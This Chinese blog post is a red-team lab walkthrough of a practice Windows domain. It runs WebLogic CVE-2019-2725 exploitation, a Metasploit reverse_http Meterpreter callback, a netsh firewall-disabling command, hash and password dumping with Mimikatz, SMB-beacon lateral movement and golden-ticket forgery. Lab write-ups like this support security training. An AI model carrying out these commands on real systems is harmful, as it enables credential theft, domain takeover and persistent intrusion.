赞
踩
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。
靶场地址:漏洞详情
环境说明:10.10.10.1/24
DMZ网段:192.168.1.0/24
DC:10.10.10.10
WEB:10.10.10.80\192.168.1.8
PC:10.10.10.20\192.168.1.11
WEB机器开启WebLogic服务
C:\Oracle\Middleware\user_projects\domains\base_domain\bin
startWebLogic---以管理员身份运行
这个窗口不要关闭
一、信息收集
扫描WEB主机
nmap -sV -T4 192.168.1.8
访问80端口,是空白
访问7001端口,发现是WebLogic服务
访问控制台:192.168.1.8:7001/console/login/LoginForm.jsp
尝试弱口令登录,被拒绝
WeblogicScan 扫描漏洞
发现CVE-2019-2725
先将防火墙和360关闭
web主机存在两个网段
创建侦听
background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.1.134
set lport 8855
set session 1
CS收到会话
设置睡眠:sleep 1
提升权限
利用插件:MS14-058漏洞提升权限
扫描端口
explore--port scan--选择10.10.10.0网段扫描
发现三台内网主机
获取hash
hashdump #获取hash
logonpasswords #获取明文密码
查看域控
关闭防火墙:netsh advfirewall set allprofiles state off
查看有几个域:net view /domain
查看域名:net config workstation
查看域内主机:net view
查询域内用户:net user /domain
查看域管理员:net group "domain admins" /domain
使用CS自带功能,RunMinikatz获取hash和明文密码
创建SMB侦听器
name:自定义
payload:选择beacon SMB
save
目标需要开放445端口和admin
上线DC
选择de1ay\administrator账户
Listener选择刚才创建的SMB
session选择
上线DC
上线PC与上线DC步骤一致
在域控获得KRBTGT账户NTLM密码哈希和SID,然后复制保存到记事本!
域名:de1ay.com
黄金票据利用
黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证。
黄金票据的条件要求:
1.域名称
2.域的SID值
3.域的KRBTGT账户NTLM密码哈希
4.伪造用户名
黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当失去域控权限时,内其他在通过域任意机器伪造票据重新获取最高权限。
WEB主机 Administrator账户权限-t>右键->Access->Golden Ticket
伪造成功
查看当前系统的票据:
mimikatz kerberos::list
可以访问域控
使用当前令牌登录PC
勾选Use session's current access token
参考:
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。